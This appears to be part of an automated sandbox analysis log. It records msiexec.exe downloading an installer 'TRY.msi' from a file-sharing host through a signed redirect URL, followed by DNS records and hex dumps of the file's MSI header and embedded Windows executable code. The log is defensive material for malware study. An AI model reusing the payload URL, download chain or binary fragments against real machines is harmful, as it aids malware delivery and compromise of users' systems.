                                                                  Apr 20, 2022 09:18:55.900031090 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900063038 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900082111 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900088072 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900104046 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900257111 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900286913 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900321007 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900327921 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900341988 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900382042 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946157932 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946217060 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946270943 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946284056 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946296930 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946331978 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946362972 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946388006 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946394920 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946407080 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946578979 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946609020 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946611881 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946624041 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946633101 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946655035 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946814060 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946845055 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946863890 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946870089 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946892977 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947037935 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947072029 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947097063 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947105885 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947125912 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947277069 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947308064 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947338104 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947361946 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947463989 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947468996 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947501898 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947534084 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947551966 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947559118 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947577953 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.950661898 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.951575994 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993635893 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993679047 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993740082 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993758917 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993771076 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993829012 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993866920 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993887901 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993899107 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993911028 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993933916 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994090080 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994134903 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994143009 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994178057 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994187117 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994198084 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994349003 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994393110 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994410038 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994422913 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994443893 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994580984 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994622946 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994656086 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994668961 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994678974 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994808912 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994851112 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994865894 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994909048 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995203018 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995213985 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995292902 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995372057 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995409012 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995440006 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995450020 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995461941 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995479107 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995512962 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995534897 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995543957 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995556116 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.999298096 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.999955893 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089478970 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089519978 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089587927 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089618921 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089667082 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089668036 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089689016 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089703083 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089705944 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089730978 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089756012 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089765072 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089828968 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089859009 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089890957 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089900017 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089910030 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089920998 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089951038 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089983940 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089996099 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090008974 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090012074 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090044975 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090090036 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090099096 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090110064 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090114117 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090143919 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090193033 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090204954 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090214014 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090219021 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090250015 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090276003 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090285063 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090298891 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090301037 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090333939 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090358019 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090368032 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090379000 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090399027 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090445042 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.097667933 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.107212067 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.107250929 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.107265949 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.107275963 CEST4434917487.238.33.8192.168.2.22

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2022 09:18:54.702529907 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Apr 20, 2022 09:18:54.721021891 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Apr 20, 2022 09:18:54.721606016 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Apr 20, 2022 09:18:54.742054939 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Apr 20, 2022 09:18:54.790144920 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Apr 20, 2022 09:18:54.810780048 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Apr 20, 2022 09:18:55.363713026 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
Apr 20, 2022 09:18:55.417620897 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
Apr 20, 2022 09:18:55.451881886 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
Apr 20, 2022 09:18:55.504235029 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 20, 2022 09:18:54.702529907 CEST | 192.168.2.22 | 8.8.8.8 | 0xce22 | Standard query (0) | filebin.net | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:54.721606016 CEST | 192.168.2.22 | 8.8.8.8 | 0xce22 | Standard query (0) | filebin.net | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:54.790144920 CEST | 192.168.2.22 | 8.8.8.8 | 0x8e74 | Standard query (0) | filebin.net | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:55.363713026 CEST | 192.168.2.22 | 8.8.8.8 | 0x5d20 | Standard query (0) | situla.bitbit.net | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:55.451881886 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ed | Standard query (0) | situla.bitbit.net | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 20, 2022 09:18:54.721021891 CEST | 8.8.8.8 | 192.168.2.22 | 0xce22 | No error (0) | filebin.net |  | 185.47.40.36 | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:54.742054939 CEST | 8.8.8.8 | 192.168.2.22 | 0xce22 | No error (0) | filebin.net |  | 185.47.40.36 | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:54.810780048 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e74 | No error (0) | filebin.net |  | 185.47.40.36 | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:55.417620897 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d20 | No error (0) | situla.bitbit.net |  | 87.238.33.8 | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:55.417620897 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d20 | No error (0) | situla.bitbit.net |  | 87.238.33.7 | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:55.504235029 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ed | No error (0) | situla.bitbit.net |  | 87.238.33.7 | A (IP address) | IN (0x0001)
Apr 20, 2022 09:18:55.504235029 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ed | No error (0) | situla.bitbit.net |  | 87.238.33.8 | A (IP address) | IN (0x0001)
                                                                  • filebin.net
                                                                  • situla.bitbit.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49173 | 185.47.40.36 | 443 | C:\Windows\System32\msiexec.exe
Timestamp | kBytes transferred | Direction | Data
2022-04-20 07:18:55 UTC | 0 | OUT | GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: filebin.net
2022-04-20 07:18:55 UTC | 0 | IN | HTTP/1.1 302 Found
Cache-Control: max-age=0
Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1
X-Robots-Tag: noindex
Date: Wed, 20 Apr 2022 07:18:55 GMT
Content-Length: 0
X-Varnish: 196823
Age: 0
Via: 1.1 varnish (Varnish/6.0)
Access-Control-Allow-Origin: *
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49174 | 87.238.33.8 | 443 | C:\Windows\System32\msiexec.exe
Timestamp | kBytes transferred | Direction | Data
2022-04-20 07:18:55 UTC | 0 | OUT | GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: situla.bitbit.net
2022-04-20 07:18:55 UTC | 1 | IN | HTTP/1.1 200 OK
Content-Length: 491520
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2022 01:28:19 GMT
ETag: "260bec1b34ce96e5ed6c42d51e7146fb"
Cache-Control: max-age=30
Content-Disposition: filename="TRY.msi"
x-amz-request-id: tx000000000000000eebd7e-00625fb3df-3b49846f-default
Content-Type: application/msword
Date: Wed, 20 Apr 2022 07:18:55 GMT
Connection: close
2022-04-20 07:18:55 UTC | 1 | IN | Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: >
2022-04-20 07:18:55 UTC | 17 | IN | Data Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 0c 02 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 28 01 00 00 03 00 00 00 90 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00 0e 00 00 00 f0 00 00 00 0f 00 00 00 f8 00 00 00 12 00 00 00 ec 01 00 00 13 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 49 6e 73 74 61 6c 6c 65 72 00 00 00 1e 00 00 00 0b 00 00 00 49 6e 74 65 6c 3b 31 30 33 33 00 00 1e 00 00 00 27 00 00 00 7b 34 39 38 32 41 36 31 43 2d 39 34 36 44 2d 34 31 36 38 2d 38 30 39 43 2d 31 33 46 46 39 39
Data Ascii: Oh+'0x(InstallerIntel;1033'{4982A61C-946D-4168-809C-13FF99
2022-04-20 07:18:55 UTC | 33 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fe ae 1e ec ba cf 70 bf ba cf 70 bf ba cf 70 bf b3 b7 f4 bf fa cf 70 bf b3 b7 e5 bf af cf 70 bf b3 b7 f3 bf 2f cf 70 bf 9d 09 0b bf b5 cf 70 bf ba cf 71 bf 25 cf 70 bf b3 b7 fa bf b7 cf 70 bf b3 b7 e2 bf bb cf 70 bf b3 b7 e1 bf bb cf 70 bf 52 69 63 68 ba cf 70 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ee dc 2e 60 00 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ppppp/ppq%ppppRichpPEL.`
2022-04-20 07:18:55 UTC | 49 | IN | Data Raw: 50 83 ec 08 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 5d 08 e8 58 a1 00 00 8b f0 33 c0 89 75 ec 89 43 08 89 43 10 89 43 14 89 45 fc e8 3e b8 01 00 8b 7e 08 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 cc a1 00 00 83 c4 04 8b c8 8d 9b 00 00 00 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 08 e8 04 b8 01 00 bf 60 a6 02 10 8b c7 8d 50 01 90 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 8f a1 00 00 83 c4 04 8b c8 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 10 e8 cd b7 01 00 bf 68 a6 02 10 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 59 a1 00 00 83 c4 04 8b c8 8d 49 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 14 c7 45 fc ff ff ff ff e8 8d b7 01 00 8b 75 ec 8b 06 8a 08 88 4b 0c e8 7e b7 01 00 8b 56 04 8a
                                                                  Data Ascii: PSVW`3PEde]X3uCCCE>~P@u+pVvNAGC`P@u+pVvNAGChP@u+pVYIvNAGCEuK~V
                                                                  2022-04-20 07:18:55 UTC65INData Raw: e8 1b 81 ff ff 8b 45 ec 3b c3 74 07 50 ff 15 38 80 02 10 8b 45 e8 3b c3 74 08 53 50 ff 15 34 80 02 10 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b d1 8b 4a 04 83 79 f4 00 75 06 32 c0 8b e5 5d c3 e8 04 00 00 00 8b e5 5d c3 55 8b ec 6a ff 68 08 70 02 10 64 a1 00 00 00 00 50 83 ec 0c 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b fa b9 08 c1 02 10 e8 7a 01 00 00 8d 45 f0 50 8b cf e8 ff fe ff ff c7 45 fc 00 00 00 00 8b 75 f0 b9 08 c1 02 10 e8 5b 01 00 00 6a 04 68 08 c1 02 10 57 e8 0e f7 ff ff 6a 01 68 08 a9 02 10 57 e8 01 f7 ff ff 85 f6 75 04 33 c0 eb 18 8b c6 8d 50 02 8d 64 24 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 50 56 57 e8 d9 f6 ff ff 6a 01 68 04 c1 02 10 57
                                                                  Data Ascii: E;tP8E;tSP4MdY_^[]UJyu2]]UjhpdPSVW`3PEdzEPEu[jhWjhWu3Pd$ffu+PVWjhW
                                                                  2022-04-20 07:18:55 UTC81INData Raw: 00 00 80 e8 08 06 00 00 83 c4 10 c6 45 fc 03 8b 55 e8 83 7a f4 00 75 51 8b 45 ec 68 b4 c7 02 10 50 8d 4d e0 56 bb 40 00 00 00 51 8b d3 b9 02 00 00 80 e8 d9 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 04 e8 fa 82 ff ff c6 45 fc 03 8b 45 e0 83 c0 f0 8d 50 0c 83 c9 ff f0 0f c1 0a 49 85 c9 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 75 4e 8b 55 ec 68 b4 c7 02 10 52 8d 45 dc 56 50 33 d2 b9 01 00 00 80 33 db e8 82 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 05 e8 a3 82 ff ff c6 45 fc 03 8b 45 dc 83 c0 f0 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 0f 84 89 01 00 00 8b 45 10 85 db 75 29 85 c0 75 13 8b 55 f0 53 52 68 01 00 00 80 8b de e8 07 0b 00 00 eb 3f 83 f8 01 75 3d 8b 45 ec 6a 00 50 68 01 00 00 80 eb 26 85 c0
                                                                  Data Ascii: EUzuQEhPMV@Q}EEEPIPBMyuNUhREVP33}EEEHJPBMyEu)uUSRh?u=EjPh&
                                                                  2022-04-20 07:18:55 UTC97INData Raw: 34 83 c0 10 6b c0 14 50 ff 35 7c 45 03 10 57 ff 35 14 2a 03 10 ff 15 68 81 02 10 3b c7 75 04 33 c0 eb 78 83 05 88 45 03 10 10 8b 35 78 45 03 10 a3 7c 45 03 10 6b f6 14 03 35 7c 45 03 10 68 c4 41 00 00 6a 08 ff 35 14 2a 03 10 ff 15 60 81 02 10 89 46 10 3b c7 74 c7 6a 04 68 00 20 00 00 68 00 00 10 00 57 ff 15 64 81 02 10 89 46 0c 3b c7 75 12 ff 76 10 57 ff 35 14 2a 03 10 ff 15 24 81 02 10 eb 9b 83 4e 08 ff 89 3e 89 7e 04 ff 05 78 45 03 10 8b 46 10 83 08 ff 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 64 81 02 10 85 c0 75 08 83 c8 ff
                                                                  Data Ascii: 4kP5|EW5*h;u3xE5xE|Ek5|EhAj5*`F;tjh hWdF;uvW5*$N>~xEF_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWdu
